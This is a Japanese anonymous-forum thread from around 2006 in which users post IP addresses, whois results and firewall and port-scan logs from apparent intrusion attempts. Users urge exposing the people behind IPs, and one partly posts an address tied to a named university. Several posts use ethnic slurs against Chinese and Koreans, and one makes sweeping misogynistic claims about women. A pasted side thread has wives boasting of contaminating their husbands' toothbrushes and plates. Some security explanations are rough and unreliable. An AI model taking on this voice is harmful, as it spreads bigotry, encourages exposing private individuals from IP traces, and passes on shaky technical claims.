⇒ちなみにpingってファイルはLinux/RSTっちゅうLinuxのウイルスだったり
　/tmp配下にPerlのBOTが吐かれてたり。恐ろしいです。要注意･･･。

>>649
アドバイスどうもです

>>649
今>>647のIPを ttp://www2.arearesearch.co.jp/ip-kensaku.html で検索したら国が出てきました。
昨日は出なかったんだがな・・・

IPアドレス 61.89.135.214
ホスト名 pon003-214.kcn.ne.jp
IPアドレス
割当国　※ 日本 (JP)
都道府県 該当なし
市外局番 該当なし
接続回線 該当なし

Domain Information: [ドメイン情報]
a. [ドメイン名] KCN.NE.JP
b. [ねっとわーくさーびすめい]
c. [ネットワークサービス名] KCN-Netサービス
d. [Network Service Name] KCN-Net Service
k. [組織種別] ネットワークサービス
l. [Organization Type] Network Service
m. [登録担当者] YK261JP
n. [技術連絡担当者] TK382JP
p. [ネームサーバ] dns0.kcn.ne.jp
p. [ネームサーバ] dns1.kcn.ne.jp
[状態] Connected (2006/10/31)
[登録年月日] 1998/10/21
[接続年月日] 1998/11/13
[最終更新] 2005/11/01 01:18:26 (JST)

IPアドレス 221.230.31.42
ホスト名 対応するホスト名がありません
IPアドレス
割当国　※ 中国 (CN)
都道府県 該当なし
市外局番 該当なし
接続回線 該当なし

IPアドレス 219.107.190.124
ホスト名 FLA1Aaz124.stm.mesh.ad.jp
IPアドレス
割当国　※ 日本 (JP)
都道府県 埼玉県
市外局番 --
接続回線 xDSL


Network Information: [ネットワーク情報]
a. [IPネットワークアドレス] 219.107.0.0/16
b. [ネットワーク名] BIGLOBE-6
f. [組織名] BIGLOBEサービス(日本電気株式会社)
g. [Organization] NEC Corporation
m. [管理者連絡窓口] NK032JP
n. [技術連絡担当者] MK11728JP
p. [ネームサーバ] ns02.mesh.ad.jp
p. [ネームサーバ] ns03.mesh.ad.jp
[割当年月日] 2002/06/14
[返却年月日]
[最終更新] 2004/04/12 17:47:01(JST)

上位情報
----------
日本電気株式会社 (NEC Corporation)
[割り振り] 219.107.0.0/16

IPアドレス 220.208.44.210
ホスト名 --
IPアドレス
割当国　※ --
都道府県 --
市外局番 --
接続回線 --

Whois 検索結果
IPアドレス
所有者情報 --
ドメイン
所有者情報 --

IPアドレス 201.43.17.63
ホスト名 201-43-17-63.dsl.telesp.net.br
IPアドレス
割当国　※ ブラジル (BR)
都道府県 該当なし
市外局番 該当なし
接続回線 該当なし

ウイルスバスターのLANパトでやたらとしらんIPがあるんだが・・・

IP近いのなら同じプロパイダの奴でしょ。

ほったらかしでおKなのか？

218.135.64.118
またあほーだぜ

210.135.99.5

ＰＣ−Ｃｌｉｅｎをかけたら不正アクセスが激減したんですが・・・
（関係ないのかな？）
それまではプリ音食べすぎのアメリカ人が狂ったように（実際問題狂ってるが）
ウチに来てました

TransScoutでしつこい奴
IPアドレス 218.171.128.96
ホスト名 218-171-128-96.dynamic.hinet.net
IPアドレス
　割当国　※ 台湾 (TW)
都道府県 該当なし
市外局番 該当なし
接続回線 該当なし

Rat トロイの木馬のデフォルト遮断
IPアドレス 125.213.101.187
ホスト名 対応するホスト名がありません
IPアドレス
　割当国　※ 中国 (CN)
都道府県 該当なし
市外局番 該当なし
接続回線 該当なし

Phinneas Phucker トロイの木馬のデフォルト遮断
IPアドレス 220.7.60.15
ホスト名 softbank220007060015.bbtec.net
IPアドレス
　割当国　※ 日本 (JP)
都道府県 群馬県
市外局番 --
接続回線 xDSL

FTP99CMP トロイの木馬のデフォルト遮断
IPアドレス 219.110.151.5
ホスト名 h219-110-151-005.catv02.itscom.jp
IPアドレス
　割当国　※ 日本 (JP)
都道府県 神奈川県
市外局番 --
接続回線 CATV

Bla トロイの木馬のデフォルト遮断
IPアドレス 222.45.80.12
ホスト名 対応するホスト名がありません
IPアドレス
　割当国　※ 中国 (CN)
都道府県 該当なし
市外局番 該当なし
接続回線 該当なし

すみません。どうして自分のパソコンを狙ってるのでしょう？
それとも手当たり次第にやってるだけなの？

>>672
IPアドレスがどういうものか考えればわかるよ。

210.136.161.74
proxy360.docomo.ne.jp
DoCoMo/2.0SH901iC(c100;TB;W30H15)
DoCoMo/2.0SH901iC(c100;TB;W30H15)

IPアドレス 221.39.214.10
ホスト名 softbank221039214010.bbtec.net
IPアドレス
　割当国　※ 日本 (JP)
都道府県 青森県
市外局番 --
接続回線 xDSL

こいつウザイ

207.46.216.30-47

末尾変えつつ百回以上
アフォですか？

>>676
てめぇが何かに感染していてアクセスがウゼェから反対にやられているんじゃねえのかよ？

Mar 6 00:21:48 ntrap sshd[3187]: refused connect from mrt02.me.noda.sut.ac.jp

アホ大学晒しあげ

詳細: 侵入を検出して遮断しました。 tmp6.2ch.net(206.223.149.90) とのすべての
通信は 30 分間にわたって遮断されます。


何故にﾀﾞｳｿ板から・・・？

>>676
一週間ぶりにPC立ち上げたらルーターに足跡があったんだが
なんで一方的に決めつけてそんなに激ってるのかわからん

カルシウム不足ですか？

>>677だった

IPアドレス 210.239.42.143
ホスト名 対応するホスト名がありません
IPアドレス
　割当国　※ 日本 (JP)
都道府県 該当なし
市外局番 該当なし
接続回線 該当なし

221.10.158.106
糞シナ

IPアドレス 206.204.51.131
ホスト名 security.symantec.com
IPアドレス
割当国　※ アメリカ合衆国 (US)
都道府県 該当なし
市外局番 該当なし
接続回線 該当なし

Whois 検索結果
IPアドレス
所有者情報 206.204.51.131　を　whois.arin.net　で検索しました

IPアドレス 206.204.51.131
ホスト名 security.symantec.com
IPアドレス
割当国　※ アメリカ合衆国 (US)
都道府県 該当なし
市外局番 該当なし
接続回線 該当なし

IPアドレス 221.235.144.175
ホスト名 対応するホスト名がありません
IPアドレス
割当国　※ 中国 (CN)
都道府県 該当なし
市外局番 該当なし
接続回線 該当なし

>>684-685
security.symantec.com

貴様の目はふしあなか？

メル友募集中だぉ
[email protected]

61.156.240.66(CN) UDP=2,1026,1027,1028,1029,1031,1032,1033,4073
221.203.145.73(CN) UDP=2,1026,1027,1028,1029,1030,1031,1032,1033,4073,4081
こいつらしつこい。

211.190.179.180(KR) TCP=6129,1025
211.154.43.85(CN) TCP=6129
Backdoorを探索中?

IPアドレス 59.117.122.6
ホスト名 59-117-122-6.dynamic.hinet.net
IPアドレス
　割当国　※ 台湾 (TW)
都道府県 該当なし
市外局番 該当なし
接続回線 該当なし

IPアドレス 221.87.148.145
ホスト名 softbank221087148145.bbtec.net
IPアドレス
　割当国　※ 日本 (JP)
都道府県 鹿児島県
市外局番 --
接続回線 xDSL

薩摩武士ですよ〜

1. 2006/03/07|22:55:23| Port scan attempt 58.18.64.162 1
2. 2006/03/07|22:45:03| Port scan attempt 218.61.35.52 1
3. 2006/03/07|22:34:57| Port scan attempt 221.195.72.74 1
4. 2006/03/07|22:29:41| Port scan attempt 58.18.64.162 1
5. 2006/03/07|21:43:55| Port scan attempt 218.61.35.52 2
6. 2006/03/07|21:23:08| Port scan attempt 221.211.255.11 1
7. 2006/03/07|19:55:17| Port scan attempt 58.18.64.162 2
8. 2006/03/07|19:40:10| Port scan attempt 60.11.125.38 2
9. 2006/03/07|19:03:53| Port scan attempt 58.18.64.162 3
10. 2006/03/07|18:50:38| Port scan attempt 221.5.251.183 9
11. 2006/03/07|17:21:00| Port scan attempt 58.18.64.162 1
12. 2006/03/07|16:50:05| Port scan attempt 218.61.35.52 1
13. 2006/03/07|13:55:16| Port scan attempt 58.18.64.162 3
14. 2006/03/07|13:03:03| Port scan attempt 221.203.145.29 1
15. 2006/03/07|12:57:39| Port scan attempt 218.61.35.52 1
16. 2006/03/07|11:20:52| Port scan attempt 58.18.64.162 1
17. 2006/03/07|11:15:10| Port scan attempt 60.11.125.38 1
18. 2006/03/07|10:40:45| Port scan attempt 221.5.251.183 2
19. 2006/03/07|09:17:54| Port scan attempt 220.168.158.13 2
20. 2006/03/07|09:12:23| Port scan attempt 58.18.64.162 1
21. 2006/03/07|09:05:29| Port scan attempt 218.61.35.52 2
22. 2006/03/07|07:55:12| Port scan attempt 58.18.64.162 2
23. 2006/03/07|07:32:22| Port scan attempt 221.211.255.11 1
24. 2006/03/07|06:12:16| Port scan attempt 58.18.64.162 4
25. 2006/03/07|05:14:52| Port scan attempt 221.211.255.11 1
26. 2006/03/07|04:29:24| Port scan attempt 58.18.64.162 2
27. 2006/03/07|02:54:53| Port scan attempt 221.211.255.11 1
28. 2006/03/07|02:53:22| Port scan attempt 60.11.125.38 2
29. 2006/03/07|02:46:28| Port scan attempt 218.61.35.52 2
30. 2006/03/06|23:21:18| Port scan attempt 58.18.64.162 5

ポートスキャン 202.214.159.206 192.168.11.10 2006/03/07 21:35:13 - 2006/03/07 21:43:58 15

Network Information: [ネットワーク情報]
a. [IPネットワークアドレス] 202.214.159.0/24
b. [ネットワーク名] ACCELIA-NET
f. [組織名] アクセリア 株式会社
g. [Organization] Accelia, Inc.
m. [管理者連絡窓口] TC116JP
n. [技術連絡担当者] AK1474JP
p. [ネームサーバ] ns-ac-01.accelia.net
p. [ネームサーバ] ns1.iij.ad.jp
[割当年月日] 2001/01/25
[最終更新] 2004/01/29 10:45:08(JST)

上位情報
----------
株式会社インターネットイニシアティブ (Internet Initiative Japan Inc.)
[割り振り] 202.214.0.0/16

下位情報
----------
該当するデータがありません。

IPアドレス 59.84.99.163
ホスト名 p163.net059084099.tokai.or.jp
IPアドレス
割当国　※ 日本 (JP)
都道府県 静岡県
市外局番 --
接続回線 種別不明

ウィンドウズファイル共有って何かあんの？
他の１３５だのの時もあるけどファイル共有が多いんだ

>>695
Remote Procedure Call (RPC)
一番セキュリティホールが多いのが135番だから、
WindowsUpdateをしていないやつらが狙われるし、感染に気づいていない感染者も一番多い。
アクセス元じゃなくてアクセス先ポートが135番になっている場合は、
不正アクセスして来たこいつらのパソコンは、まずネットワークワームに感染している。
このポートだけは擬似的にファイアーウォールでしか閉じられない。

>696
どうもありがとう。
ポートは139だった…

IPアドレス 219.206.140.55
ホスト名 softbank219206140055.bbtec.net
IPアドレス
割当国　※ 日本 (JP)
都道府県 神奈川県
市外局番 --
接続回線 xDSL

5分置きに突撃してくる。うざい(；・∀・)

IPアドレス 221.244.122.36
ホスト名 221x244x122x36.ap221.ftth.ucom.ne.jp
IPアドレス
　割当国　※ 日本 (JP)
都道府県 不明
市外局番 --
接続回線 光

58.0.132.48

うぜー
しかもこいつ暢気に鯖なんか立ててる

libwww-perl/5.803
とか
lwp-trivial/1.41
を使って、とうの昔に既になくなったディレクトリやファイルを
２，３日ごとにチェックしにくるのって怪しいよな？
晒すべきか？

うげー！
ＩＰ調べてみた上でググってみたら、某ＩＴ関連大学（？）の教授だったぞ！
結構有名な奴みたいじゃねえかよ。
しかも２ちゃんに彼に関するスレまでありやがる…
俺はどうすべきなのだろう。はっきり言って超キモい。

大学に電話かメールすべきだろうか

（＾ω＾；）がんばれ…

>>703
ここで晒すつもりだったが、誰のＩＰかハッキリわかってしまうので
非常にまずい気がする
本人がやっているのだとしたら、もう滅茶苦茶バカな奴としか胃炎
それもとこいつのパソが悪用されているのか…
むう・・どうすんべ・・・

IPアドレス 219.48.146.99
ホスト名 softbank219048146099.bbtec.net
IPアドレス
　割当国　※ 日本 (JP)
都道府県 静岡県
市外局番 --
接続回線 xDSL


IPアドレス 210.236.186.123
ホスト名 dhcp186-122.ztv.ne.jp
IPアドレス
　割当国　※ 日本 (JP)
都道府県 和歌山県
市外局番 --
接続回線 CATV

63.251.51.229

>>704
わははははh！
晒せ晒せw

>>704
とりあえずそのスレにご報告しておけ。

>>708
けどその２ｃｈのスレけっこう古くて今だれも書き込んでねえんだよ
やっぱここに晒しとくか。

163.221.xx.xx
奈良先端科学技術大学院大学

まずはとりあえずこれだけにしとく。ＩＰ検索で出てくる当人の仕業では
ないのかもしれんし…
にしても、とんちんかんな場所にコソコソとアクセスを試みてくるんで、
まじでウザい。

ほぼ lwp-trivial/1.41。ごくたまに libwww-perl/5.803。

嘘書くなとかいっていちゃもんつけられる可能性もあるかもしれねえから、
しばらくアクセスログ保管しとこう。
で、あと１週間様子見てまだ続くようなら大学に正式に苦情してみるか。

>>711
奈良先端か。
じゃ別にIT系ってわけでもないな、まあNECが噛んでるからあれだけど
あそこは学生も年齢の幅も国籍もいろいろいるからなー
しかも、学生寮も家族寮も教授用の宿舎もLAN完備だし、当人の仕業でない可能性も高いな
研究室以外、出入りチェックも無いに等しいからね

信頼済みではないコンピュータ機器に接続されています。

IPアドレス192、168、1，1　コンピュータ名?
MACアドレス00：0ｂ：a2:21:c7:26

IPアドレス220.213.99.117

Rat トロイの木馬
IPアドレス 217.122.128.221
ホスト名 cc503731-a.hgv1.dr.home.nl
IPアドレス
　割当国　※ オランダ (NL)

Ripper トロイの木馬
IPアドレス 61.64.169.200
ホスト名 61-64-169-200-adsl-tai.dynamic.so-net.net.tw
IPアドレス
　割当国　※ 台湾 (TW)

Ripper トロイの木馬
IPアドレス 59.117.122.6
ホスト名 59-117-122-6.dynamic.hinet.net
IPアドレス
　割当国　※ 台湾 (TW

IPアドレス 218.130.40.10
ホスト名 softbank218130040010.bbtec.net
IPアドレス割当国　※ 日本 (JP)
都道府県 大阪府
市外局番 --
接続回線 xDSL

210.136.232.249
ad.jp.ap.valuecommerce.com

こんな時間に勝手に何やってるんだ？？

>>715
それバリューコマースのクリック型広告鯖じゃねえの？

>>718
そうだけど、なんでうちの鯖に約二時間の間、執拗にアクセスしてるんかが不明
こっちは何もしてないんだけど、どういうこと？

IPアドレス 58.3.88.93
ホスト名 ppp5935.hakata03.bbiq.jp
IPアドレス
割当国　※ 日本 (JP)
都道府県 不明
市外局番 --
接続回線 光

かなり調べたけど都道府県がでねえー(ノд｀)
晒したいのに・・　｡゜(ﾟ´Д`ﾟ)゜｡

>>718
多分、福岡県福岡市博多区。

bbiq
http://www.bbiq.jp/
は吸収のプロバ。

IPアドレス 219.116.204.171
ホスト名 eatkyo369171.adsl.ppp.infoweb.ne.jp
IPアドレス
　割当国　※ 日本 (JP)
都道府県 埼玉県
市外局番 --
接続回線 xDSL

IPアドレス 220.208.245.252
ホスト名 nissin48252.ccnw.ne.jp
IPアドレス
　割当国　※ 日本 (JP)
都道府県 愛知県
市外局番 --
接続回線 CATV

>>718,719-720
何をどう攻撃されたのか詳しく

IPアドレス 220.213.59.241
ホスト名 z241.220-213-59.ppp.wakwak.ne.jp

IP: 218.110.6.185
Node: 設計課共用
Group: WORKGROUP
NetBIOS: WORKGROUP
MAC: 削除
DNS: p6e06b9.tokynt01.ap.so-net.ne.jp

so-netサンいいんすか？

219.182.184.20
しつこくて困ってます。
何とかならないですか？

>>あほーじゃ文句言っても無駄そうだから遮断してあきらめれ

2006/03/13 22:58:32,スーパーバイザ,
侵入: HTTP MSIE JavaScript OnLoad Rte CodeExec,"
侵入: HTTP MSIE JavaScript OnLoad Rte CodeExec
侵入者: pc7.2ch.net(206.223.147.60)(http(80))
危険度: 高レベル プロトコル: TCP
攻撃された IP: localhost
攻撃された ポート: 4930"

これって何だろ。

ブラクラ・チェッカーで板を検査すると、
臭いのが出るんだよなｗ

IP: 218.70.253.186
Node: BILLGATES
Group: WORKGROUP
NetBIOS: __MSBROWSE__
MAC: 削除
DNS: BILLGATES

ビルゲイツ？

思わず検索かけちゃうぞ？

IPアドレス 59.146.166.124
ホスト名 p92a67c.szoknt01.ap.so-net.ne.jp

ルータのセキュリティ・ログもお祭り状態だな・・・。

よく分からん世界だな・・・。

IPアドレス 206.246.241.120
ホスト名 tawakoni.html.com

ほんと多いな
いつか恨みでも買ったかな

61.125.152.248:135
攻撃されまくりんぐ

IPアドレス 222.5.14.186
ホスト名 ZK014186.ppp.dion.ne.jp
IPアドレス
　割当国　※ 日本 (JP)
都道府県 北海道
市外局番 --
接続回線 xDSL

それは、どこかで見たことがあるような（笑

http://mickey.mirv.net/2chnis.html

ああ、これかぁ。しかし、別タブ開いてたような気はするが、不思議だなぁ。

222.162.246.244(CN)

なんでうちにwww.lineage2.jpが…？

うちにもこないだ来たよwww.lineage2.jp
ボットとかの関係?ネトゲやらんからよくわからん。

>>724
通報してやれｗ

IPアドレス 220.106.47.225
ホスト名 p11225-adsau14honb8-acca.tokyo.ocn.ne.jp
IPアドレス
　割当国　※ 日本 (JP)
都道府県 不明
市外局番 --
接続回線 xDSL

IPアドレス 61.213.172.117
ホスト名 server117.canalize.com
IPアドレス
　割当国　※ 日本 (JP)
都道府県 該当なし
市外局番 該当なし
接続回線 該当なし

この二つがほぼ同じ時間に同時に攻撃してきたんだけど

【積年の】旦那にしてる密かな仕返し【恨みじゃー】
http://human5.2ch.net/test/read.cgi/ms/1141694640/

8 名前：可愛い奥様[] 投稿日：2006/03/07(火) 11:05:23 ID:8dtluKkp
夫の歯ブラシで洗面所の排水溝掃除。
洗面所をビショビショに汚した罰だ。

20 名前：可愛い奥様[age] 投稿日：2006/03/08(水) 00:40:17 ID:pRrk6A21
前に頭きた時あって
１度だけ歯ブラシで肛門カキカキしちゃった

22 名前：可愛い奥様[] 投稿日：2006/03/08(水) 01:27:12 ID:gU5mHc7J
よかった。どこのお宅も同じようなことしてて。

24 名前：可愛い奥様[] 投稿日：2006/03/08(水) 01:36:35 ID:SSSFsTqE
そうそう、ヘンなモノはダンナのお皿へ直行だよね。

41 名前：可愛い奥様[] 投稿日：2006/03/08(水) 11:55:18 ID:sjj+/60Q
見てるだけで気が晴れるな！
皆さん、頑張ってね！

42 名前：可愛い奥様[sage] 投稿日：2006/03/08(水) 20:33:51 ID:Ju2N1s7+
年金分割が楽しみじゃのう

63 名前：可愛い奥様[] 投稿日：2006/03/10(金) 08:55:20 ID:qLfJYpJR
家族で密かにはぶっている。

男性は肉体が汚く、精神が美しい傾向がある。（気に入らない相手に肉体的攻撃を加える⇒精神的攻撃も加える男は猛者）
女は肉体が美しく、精神が汚い傾向がある。（気に入らない相手に精神的攻撃を加える⇒肉体的攻撃も加える女は猛者）
女は隠れて悪事をする。気に入らない女子を便所でボコったり、便器舐めさせたり、男の友人を使ってレイプ、仲間外れにしたり。陰口、嫉妬。
女は対人関係において、この汚い性格を隠そうとするため、外面が非常によくなる。（猫かぶり）
男性諸君は外面に騙されないように気を付けて下さい。

IPアドレス 221.244.122.36
ホスト名 221x244x122x36.ap221.ftth.ucom.ne.jp
IPアドレス
　割当国　※ 日本 (JP)
都道府県 不明
市外局番 --
接続回線 光

よく見てみると>>699と同じだ

219.95.79.138(マレーシア)
156.17.85.20(オランダ)

222.92.248.132(CN) verify.qq.com/getimage

何も出ないっつーの

222.168.124.231(CN) http://www.yahoo.co.jp/http/www.yahoo.co.jp/

中国ってほんとにどうしようもないな

だって中国だもん

IPアドレス220.208.33.148
IPアドレス218.104.36.242

Mar 16 18:20:19 kabe sshd[930]: refused connect from pc3.message1-unet.ocn.ne.jp
* 中略 *
Mar 16 18:29:56 kabe sshd[1277]: refused connect from pc3.message1-unet.ocn.ne.jp

a. [IPネットワークアドレス] 219.166.162.152/29
b. [ネットワーク名] MESSAGE-1
f. [組織名] メッセージワン株式会社
g. [Organization] MESSAGE ONE CORPORATION
m. [管理者連絡窓口] MK8019JP
n. [技術連絡担当者] MK8019JP
p. [ネームサーバ]

侵入できそうなところを見つけてはコンサルと称して強請りでもやってのか、この会社は。

219.255.135.131

キムチ野郎w

82.70-85-153.reverse.theplanet.com

70.85.153.82

中国からワームがたくさん送られてくるのを何とかしてくれ。
多いときは10秒で30箇所くらいから送られてくるのは参った。

202.103.178.230
嫌だなぁ、こいつ

Network Information: [ネットワーク情報]
a. [IPネットワークアドレス] 219.122.128.0/18
b. [ネットワーク名] K-OPTICOM
f. [組織名] 株式会社ケイ・オプティコム
g. [Organization] K-Opticom Corporation
m. [管理者連絡窓口] YM555JP
n. [技術連絡担当者] YM555JP
n. [技術連絡担当者] HA3280JP
p. [ネームサーバ] ns1.eonet.ne.jp
p. [ネームサーバ] ns7.eonet.ne.jp
[割当年月日] 2002/11/21
[最終更新] 2005/12/21 13:38:19(JST)

上位情報
----------
株式会社ケイ・オプティコム (K-Opticom Corporation)
[割り振り] 219.122.128.0/17

下位情報
----------
該当するデータがありません。

こいつ、うざい。

TCP SYN FLOOD攻撃：１８回
IPアドレス 60.209.235.203
ホスト名 対応するホスト名がありません
IPアドレス割当国　※ 中国 (CN)

TCP SYN FLOOD攻撃：１９回
IPアドレス 219.153.17.207
ホスト名 対応するホスト名がありません
IPアドレス割当国　※ 中国 (CN)

TCP SYN FLOOD攻撃：２４回
IPアドレス 207.68.178.61
ホスト名 対応するホスト名がありません
IPアドレス割当国　※ アメリカ合衆国 (US)

ポートスキャン：６回
IPアドレス 207.46.216.41
ホスト名 対応するホスト名がありません
IPアドレス割当国　※ アメリカ合衆国 (US)

cnとかkrなんか国として蹴っちゃえばいいのに

222.92.248.53

連中が中国だからなのか、それともこちらが日本だからなのか・・・。

IPアドレス 219.99.205.242
ホスト名 adsl-1-7242.adsl.nsk.ne.jp
IPアドレス
　割当国　※ 日本 (JP)
都道府県 不明
市外局番 --
接続回線 xDSL

侵入：MS ASN1 Integer Overflow TCP
侵入者：58.78.240.199(1288)
危険度：高
プロトコル：TCP